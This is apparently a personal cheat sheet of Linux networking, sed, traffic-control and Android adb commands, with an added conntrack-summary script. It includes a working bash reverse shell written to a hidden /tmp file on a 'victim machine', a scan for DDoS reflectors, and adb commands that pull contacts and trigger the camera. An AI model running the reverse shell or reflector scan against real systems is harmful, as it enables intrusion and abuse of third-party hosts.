hello world.
nmap fun
nmap operating system guess
nmap -O 1.2.3.4
Scan all 65535 ports:
nmap -p- 1.2.3.4
TCP SYN and UDP scan for all ports, without checking ping
nmap -sS -sU -PN -p 1-65535 1.2.3.4
Scan for UDP DDOS reflectors? untested
nmap -sU -A -PN -n -pU:19,53,123,161 --script=ntp-monlist,dns-recursion,snmp-sysdescr 1.2.3.4/24
wireshark through ssh
wireshark through ssh with pipe, w big packets
ssh 10.0.1.1 "tcpdump -i pppoe-wan -w - 'not port 2'" | wireshark -k -i -
wireshark through ssh with pipe, with small packets
ssh 10.0.1.1 "tcpdump -i pppoe-wan -s0 -w - 'not port 2'" | wireshark -k -i -
Shells fun
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md - diversity
Tested manual bash reverse shell
First, on your machine, listen.
netcat -nlvp 4444
Then, on victim machine
echo "/bin/sh -i >& /dev/tcp/1.2.3.4/4444 0>&1" > /tmp/.s
bash /tmp/.s
1.2.3.4 = ip of victim. 4444 = port, /tmp/.s = location of bash script
Set password without proper command prompt
# echo "linuxpassword" | passwd --stdin linuxuser
on modern Linux. Or:
# echo -e "linuxpassword\nlinuxpassword" | passwd linuxuser
Sed replacement of special characters (and normal)
replaces - with : in text document
sed 's/\-/:/g' oui.txt >> ouioui.txt
fix need root problems from binaries
sed -i 's/geteuid/getppid/' /usr/bin/vlc
replace http:// with https://www.mysite.org (any text, including the / character)
sed 's+http://+https://www.mysite.org+g' file.txt
remove duplicate lines of text in a file
awk '!seen[$0]++' file.txt
Set download bandwidth limit of eth2 to 0,5 mb with 32kbit burst and drop all packets delayed more than 400 ms
tc qdisc add dev eth2 root tbf rate 512kbit burst 32kbit latency 400ms
manual ip traffic inspection
ip_conntrack for ipv4 & nf_conntrack for ipv6
cat /proc/net/ip_conntrack
cat /proc/net/nf_conntrack
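Added example (not part of the original notes): a shell function that turns the conntrack dump above into a per-destination flow count, handling both the nf_conntrack and the legacy ip_conntrack line layouts. The function names and the sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: summarize a conntrack dump per destination (original direction).
# Sample lines below are constructed; function names are illustrative.

# conntrack_summary FILE   ("-" reads stdin; default /proc/net/nf_conntrack, needs root)
# Output: "count proto state dst:dport", busiest first.
conntrack_summary() {
    awk '
    {
        # nf_conntrack lines start with "ipv4 2" or "ipv6 10"; ip_conntrack lines do not.
        off = ($1 == "ipv4" || $1 == "ipv6") ? 2 : 0
        proto = $(off + 1)
        # TCP has a state word before the first key=value token; UDP and ICMP do not.
        state = ($(off + 4) ~ /=/) ? "-" : $(off + 4)
        dst = ""; dport = "-"; unreplied = 0
        for (i = off + 4; i <= NF; i++) {
            if ($i == "[UNREPLIED]") unreplied = 1
            # The first dst=/dport= pair is the original direction; the second is the reply.
            if (dst == "" && $i ~ /^dst=/) dst = substr($i, 5)
            if (dport == "-" && $i ~ /^dport=/) dport = substr($i, 7)
        }
        if (dst == "") next                      # not a flow entry
        if (unreplied && state == "-") state = "UNREPLIED"
        count[proto " " state " " dst ":" dport]++
    }
    END { for (k in count) print count[k], k }
    ' "${1:-/proc/net/nf_conntrack}" | LC_ALL=C sort -k1,1nr -k2
}

# Constructed sample: three nf_conntrack lines and one legacy ip_conntrack line.
conntrack_sample() {
    cat <<'EOF'
ipv4     2 tcp      6 431999 ESTABLISHED src=10.0.1.23 dst=198.51.100.7 sport=51514 dport=443 src=198.51.100.7 dst=203.0.113.5 sport=443 dport=51514 [ASSURED] mark=0 use=2
ipv4     2 tcp      6 431990 ESTABLISHED src=10.0.1.24 dst=198.51.100.7 sport=40112 dport=443 src=198.51.100.7 dst=203.0.113.5 sport=443 dport=40112 [ASSURED] mark=0 use=2
ipv4     2 udp      17 25 src=10.0.1.23 dst=192.0.2.53 sport=38211 dport=53 [UNREPLIED] src=192.0.2.53 dst=203.0.113.5 sport=53 dport=38211 mark=0 use=2
tcp      6 110 SYN_SENT src=10.0.1.30 dst=192.0.2.99 sport=50000 dport=23 [UNREPLIED] src=192.0.2.99 dst=203.0.113.5 sport=23 dport=50000 use=1
EOF
}

conntrack_sample | conntrack_summary -
```

Many flows stuck in SYN_SENT or UNREPLIED toward one destination are the entries worth a closer look with the packet capture commands above.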
Android
fun adb commands:
adb shell am start -n com.android.chrome/com.google.android.apps.chrome.Main -d "www.facebook.com"
generic_x86:/ $ pm list packages -f
130|generic_x86:/ $ pm clear com.google.android.youtube
generic_x86:/ $ pm dump com.android.calculator2 | grep -A 1 MAIN
android.intent.action.MAIN:
b91fd0a com.android.calculator2/.Calculator filter 84c5cb
Action: "android.intent.action.MAIN"
Category: "android.intent.category.LAUNCHER"
generic_x86:/ $ am start -n com.android.calculator2/.Calculator
Starting: Intent { cmp=com.android.calculator2/.Calculator }
adb shell "am start -a android.media.action.IMAGE_CAPTURE" && \
sleep 1 && \
adb shell "input keyevent 27"
logcat
take a picture of screen, or video (with audio) from camera.
adb shell screencap /sdcard/img.png
adb shell screenrecord /sdcard/video.mp4
When done recording, Ctrl+C.
Pull contacts:
adb shell content query --uri content://com.android.contacts/data --projection display_name:data1:data4:contact_id